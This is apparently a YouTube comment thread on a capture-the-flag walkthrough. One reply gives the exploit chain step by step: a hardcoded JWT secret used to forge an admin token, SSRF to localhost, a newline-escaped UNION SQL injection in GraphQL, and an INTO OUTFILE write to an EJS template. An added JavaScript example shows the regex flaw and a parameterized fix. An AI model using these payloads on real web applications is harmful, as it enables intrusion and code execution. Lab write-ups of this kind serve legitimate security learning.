This guy is going to be the best hacker in the world one day!
Haha, thanks Culi! :)
thanks a lot mate, you explain very well
@imaverygoodguy Thank you very much for watching! I am glad that you found the video useful! 🙂
great explanation, btw can you put the exploits so we can copy thanks
Thank you very much! Here are my notes for this challenge with all commands:
1) For the /admin & /graphql endpoints I need a valid JWT cookie with the role set to admin.
1.1) I found a JWT secret hardcoded --> Str0ng_K3y_N0_l3ak_pl3ase? and by using jwt.io I was able to forge a cookie and set my role to admin.
2) I found SSRF when generating a report and I was able to call Collaborator.
3) I was able to access /admin by forging a JWT token with jwt.io so that the user role equals admin, and by passing the URL in the generate-report function as: 127.0.0.1/admin?token=
4) I was able to execute GraphQL queries with the following URL:
127.0.0.1:1337/graphql?token=&query={getDataByName(name:"John"){name,department,isPresent}}
5) Now this is vulnerable to SQLi because the regex ignores everything after the newline character, so we are UNICODING
so as not to break the GraphQL query, and from there we conducted a classic UNION-based attack to find out the exact number of columns (4):
127.0.0.1:1337/graphql?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4iLCJpYXQiOjE3MTkwNzQyODB9.pEww2SEUcXqPFgdWzYPWBfYLNaIf-J-XMLFLm-ciRRU&query={getDataByName(name:"a\u000d\u000a'UNION SELECT NULL,NULL,NULL,NULL-- "){name,department,isPresent}} ---> note the space after the comment since we are using MySQL
5.1) Now the payload for combining SQL injection with EJS code execution:
&query={getDataByName(name:"a\u000d\u000a'UNION SELECT '',NULL,NULL,NULL INTO OUTFILE '/app/views/errors/404.ejs'-- "){name,department,isPresent}}
6) Now when we navigate to a nonexistent location such as /test, 404.ejs will be triggered and we got the flag!
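The newline trick in step 5 only works because the name check stops looking at the first line. As an added example (not code from the challenge or the video), the snippet below models that failure mode with a multiline-anchored regex, since the challenge's real pattern is not shown here, and puts a strict validator plus a parameterized lookup beside it; `buildLookup` and its `?` placeholder are assumptions about how a resolver would hand the value to a MySQL driver.

```javascript
// Added example: why an anchored name regex can still admit a
// newline-prefixed payload, and what a stricter check looks like.
// ASSUMPTION: the challenge's real regex is not on the page; the weak
// pattern below uses the 'm' flag, under which $ matches at any line end.

const NAME_RE_WEAK = /^[A-Za-z ]+$/m;   // 'm': ^ and $ apply per line
const NAME_RE_STRICT = /^[A-Za-z ]+$/;  // no 'm': the whole string must match

// Constructed input in the shape of the write-up's payload: a harmless
// first line, then CR LF, then SQL. The GraphQL literal "a\u000d\u000a'..."
// decodes to exactly this string before the resolver ever sees it.
const PAYLOAD = "a\r\n'UNION SELECT NULL,NULL,NULL,NULL-- ";

function isValidNameWeak(name) {
  // Passes as long as the FIRST line is clean; the rest is never examined.
  return NAME_RE_WEAK.test(name);
}

function isValidNameStrict(name) {
  // Whole-string anchor, plus an explicit ban on control characters so the
  // decision does not hinge on regex anchor semantics at all.
  return NAME_RE_STRICT.test(name) && !/[\u0000-\u001f\u007f]/.test(name);
}

// Defensive resolver step: validate, then keep the value out of the SQL text
// entirely by passing it as a bound parameter (hypothetical driver contract:
// query string with '?' placeholders and a separate params array).
function buildLookup(name) {
  if (!isValidNameStrict(name)) {
    return { ok: false, error: "invalid name" };
  }
  return {
    ok: true,
    sql: "SELECT name, department, isPresent FROM staff WHERE name = ?",
    params: [name],
  };
}
```

Even with the strict check in place, the parameterized query is the control that actually removes the injection; the regex only narrows what reaches it.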
@milosmarkovic4566 appreciate it